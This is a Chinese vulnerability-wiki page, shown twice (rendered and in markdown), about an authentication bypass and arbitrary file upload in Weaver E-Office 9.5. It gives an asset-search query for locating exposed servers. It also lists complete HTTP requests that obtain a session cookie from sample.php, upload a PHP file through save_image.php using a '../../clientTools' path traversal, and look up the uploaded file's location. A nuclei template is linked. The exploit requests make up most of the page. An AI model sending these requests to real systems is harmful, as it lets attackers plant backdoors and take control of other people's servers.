fofamini-wiki

登录白背景

源码

泛微E-Office save_image任意文件上传漏洞

一、漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

获取有效cookie

GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

利用上一步获取到的cookie上传文件

POST /general/system/interface/theme_set/save_image.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymzrNfz1ehkVc9A3Z
Cookie: {cookie}
 
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="image_type"
 
../../clientTools
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
 
123
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="theme_name"
 
theme3
------WebKitFormBoundarymzrNfz1ehkVc9A3Z--

通过获取到的cookie，获取上传文件位置

GET /general/down.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip

/clientTools/1911928938.php

nuclei脚本

泛微-eoffice-sample-save-image-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/feqtm09d1tiib9ii

# 泛微E-Office save_image任意文件上传漏洞

# 一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

# 二、影响版本
+ 泛微 E-Office 9.5

# 三、资产测绘
+ hunter`app.name="泛微 e-office OA"`
+ 特征

![1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e.png](./img/3Tp9bdc_JYxIOZ2t/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-100405.png)

# 四、漏洞复现
1. 获取有效cookie

```plain
GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```

![1702437960668-5128c282-085e-4f2f-b966-8ef776edee52.png](./img/3Tp9bdc_JYxIOZ2t/1702437960668-5128c282-085e-4f2f-b966-8ef776edee52-921417.png)

2. 利用上一步获取到的cookie上传文件

```plain
POST /general/system/interface/theme_set/save_image.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymzrNfz1ehkVc9A3Z
Cookie: {cookie}
 
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="image_type"
 
../../clientTools
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
 
123
------WebKitFormBoundarymzrNfz1ehkVc9A3Z
Content-Disposition: form-data; name="theme_name"
 
theme3
------WebKitFormBoundarymzrNfz1ehkVc9A3Z--
```

![1702438497023-8d1e57de-bd80-4aaa-8e4a-c1411e98b5a3.png](./img/3Tp9bdc_JYxIOZ2t/1702438497023-8d1e57de-bd80-4aaa-8e4a-c1411e98b5a3-553545.png)

3. 通过获取到的cookie，获取上传文件位置

```plain
GET /general/down.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip
```

![1702438550568-c1f91372-c025-403d-9311-74da9bc35378.png](./img/3Tp9bdc_JYxIOZ2t/1702438550568-c1f91372-c025-403d-9311-74da9bc35378-030209.png)

```plain
/clientTools/1911928938.php
```

![1702438572270-17ad434a-f38c-4427-9c03-5ca6e1d38ca1.png](./img/3Tp9bdc_JYxIOZ2t/1702438572270-17ad434a-f38c-4427-9c03-5ca6e1d38ca1-602200.png)

nuclei脚本

[泛微-eoffice-sample-save-image-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1723455981437-571123b3-d142-44bb-acb7-760fe24dcd84.yaml)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/feqtm09d1tiib9ii>

fofamini-wiki

泛微E-Office save_image任意文件上传漏洞

一、漏洞简介

<font style="color:rgb(0, 0, 0);">二、影响版本</font>

<font style="color:rgb(0, 0, 0);">三、资产测绘</font>

<font style="color:rgb(0, 0, 0);">四、漏洞复现</font>